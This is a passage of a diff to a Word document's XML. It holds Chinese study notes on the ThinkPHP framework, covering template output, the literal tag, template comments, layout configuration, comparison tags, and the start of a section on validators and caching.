+              <w:t>系统</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>变量输出</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：不需要在控制器中赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F761622" wp14:editId="53415E97">
+                  <wp:extent cx="3924300" cy="742950"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="19" name="图片 19"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId25"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3924300" cy="742950"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>原样</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>输出</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：防止被模板引擎解析</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>可以使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>literal</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>标签来防止模板标签被解析，例如：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{literal}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Hello,{$name}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>！</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>//{$name}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>会</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>原样输出，不会被解析成</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>变量</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{/literal}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>注释</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">{/* </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>注释内容</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> */ } </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>或</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>注释内容</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>布局配置</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>选择</w:t>
+            </w:r>
+            <w:r>
+              <w:t>合适的模板文件</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）全局模板：整个项目用同一个样式的模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>config.php</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1830"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'template' =&gt; [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1830"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        'layout_on'=&gt;true,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>开启</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>全局模板</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1830"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        'layout_name'=&gt;'layout',</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>全局</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板文件名</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1830"/>
+              </w:tabs>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:ind w:firstLine="420"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>全局</w:t>
+            </w:r>
+            <w:r>
+              <w:t>模板示例：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{include file="public/header" /}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {__CONTENT__}  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>这里会</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>填充</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>fetch</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>时指定的模板内容</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{include file="public/footer" /}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>布局</w:t>
+            </w:r>
+            <w:r>
+              <w:t>标签</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>不配置</w:t>
+            </w:r>
+            <w:r>
+              <w:t>config.php</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{layout name="layout" /}  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>直接</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>在模板中声明要使用的模板布局</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="a3"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中指定模板布局</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;engine-&gt;layout('Layout/newlayout');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>临时关闭当前模板的布局功能</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     $view-&gt;engine-&gt;layout(false);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="735"/>
+              </w:tabs>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>标签库</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>内置标签库无需导入即可使用，并且不需要加</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>XML</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>中的标签库前缀，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>内置的标签库是</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Cx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>标签库</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CFF7AC" wp14:editId="3387A9D3">
+                  <wp:extent cx="3952875" cy="3449955"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="20" name="图片 20"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId26"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952875" cy="3449955"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>比较</w:t>
+            </w:r>
+            <w:r>
+              <w:t>标签</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>调用</w:t>
+            </w:r>
+            <w:r>
+              <w:t>格式：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>比较标签</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name="</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>变量</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>" value="</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>"}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="350" w:firstLine="735"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>内容</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>比较标签</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="300" w:firstLine="630"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49BDF5DF" wp14:editId="13DECFFD">
+                  <wp:extent cx="1714500" cy="1971675"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="21" name="图片 21"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId27"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1714500" cy="1971675"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">6 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>验证器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:t>缓存</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="5000" w:type="pct"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6437"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1667" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>V</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>alidate</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>验证器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
+            <w:bookmarkStart w:id="2" w:name="OLE_LINK2"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$validate = new Validate</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
